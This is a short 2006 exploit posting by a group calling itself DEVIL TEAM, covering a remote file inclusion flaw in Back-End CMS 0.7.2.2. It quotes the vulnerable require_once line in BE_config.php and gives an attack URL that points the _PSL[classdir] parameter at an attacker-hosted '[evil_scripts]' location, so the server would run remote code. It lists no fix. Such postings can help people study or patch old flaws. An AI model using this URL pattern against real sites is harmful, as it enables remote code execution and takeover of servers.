Back-End CMS <= 0.7.2.2 (BE_config.php) Remote Include Vulnerability

2006-05-25 00:00:00

################# DEVIL TEAM THE BEST POLISH TEAM ##################
#
# Back-End CMS - Remote File Include Vulnerabilities
# Find by Kacper (Rahim).
# Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
# Contact: [email protected] or http://www.devilteam.yum.pl
# Site of script: http://www.back-end.org
#
####################################################################
*/

BE_config.php Line 27-31:

[code]
...
// Script timer
require_once($_PSL['classdir'] . '/BE_phpTimer.class');
$scriptTimer = & pslSingleton('phpTimer');
$scriptTimer->start('main');
/* Use Example
...
[/code]


/*

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.site.com/[Back-End_path]/BE_config.php?_PSL[classdir]=[evil_scripts]

#Elo ;-)

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.